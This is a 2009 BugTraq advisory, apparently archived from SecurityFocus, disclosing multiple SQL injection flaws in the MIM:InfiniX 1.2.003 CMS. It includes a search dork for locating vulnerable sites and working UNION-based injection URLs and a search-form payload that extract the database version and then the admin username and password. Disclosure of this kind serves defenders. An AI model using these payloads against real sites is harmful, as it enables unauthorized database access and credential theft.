BugTraq
MULTIPLE REMOTE SQL INJECTION VULNERABILITIES---MIM:InfiniX v1.2.003---> Apr 28 2009 02:14PM
y3nh4ck3r gmail com
------------------------------------------------------------------------
--

MULTIPLE REMOTE SQL INJECTION VULNERABILITIES --MIM:InfiniX v1.2.003-->

------------------------------------------------------------------------
--

CMS INFORMATION:

-->WEB: http://mim.infinix.it

-->DOWNLOAD: https://sourceforge.net/projects/infinix/

-->DEMO: http://mim.infinix.it

-->CATEGORY: CMS / Portal

-->DESCRIPTION: MIM:InfiniX Manuale Intermediale della Modernita': Infinite Info...

in Xml PHP-XHTML-XML-XSL-CSS-AJAX-RDF. Design your CMS and store...

-->RELEASED: 2009-04-21

CMS VULNERABILITY:

-->TESTED ON: firefox 3

-->DORK: "Developed by rbk"

-->CATEGORY: MULTIPLE SQL INJECTION VULNERABILITIES

-->AFFECT VERSION: 1.2.003 (maybe <= ?)

-->Discovered Bug date: 2009-04-27

-->Reported Bug date: 2009-04-27

-->Fixed bug date: 2009-04-28

-->Info patch: v1.2.003

-->Author: YEnH4ckEr

-->mail: y3nh4ck3r[at]gmail[dot]com

-->WEB/BLOG: N/A

-->COMMENT: A mi novia Marijose...hermano,cunyada, padres (y amigos xD) por su apoyo.

-->EXTRA-COMMENT: Gracias por aguantarme a todos! (Te kiero xikitiya!)

#########################

////////////////////////

SQL INJECTION (SQLi):

////////////////////////

#########################

<<<<---------++++++++++++++ Condition: magic_quotes_gpc=off +++++++++++++++++--------->>>>

-------

INTRO:

-------

Admin choose to use database or not.

This CMS is completely vulnerable to SQL Injection (I only show some vars).

------------------

PROOF OF CONCEPT:

------------------

For example ("month" and "year" GET vars). Links:

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5
&year=2009%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5
%27+AND+0+UNION+ALL+SELECT+1,version(),database(),4,5,6/*&year=2009

Another example (search post form). Search this:

anything%')) union all select 1,database(),version(),user(),5,6,7,8,9,database(),11#

----------

EXPLOITS:

----------

We get the admin credentials:

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5
&year=2009%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6 FROM admin WHERE id=1/*

http://[HOST]/[HOME_PATH]/index.php?mode=calendar&selectedday=18&month=5
%27+AND+0+UNION+ALL+SELECT+1,user,pass,4,5,6+FROM+admin+WHERE+id=1/*&yea
r=2009

anything%')) union all select 1,database(),database(),concat(user,'--::--',pass),5,6,7,8,9,database(),
11 FROM admin WHERE id=1#

#######################################################################

#######################################################################

##*******************************************************************##

## ESPECIAL GREETZ TO: Str0ke, JosS, ... ##

##*******************************************************************##

##-------------------------------------------------------------------##

##*******************************************************************##

## GREETZ TO: SPANISH H4ck3Rs community! ##

##*******************************************************************##

#######################################################################

#######################################################################

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus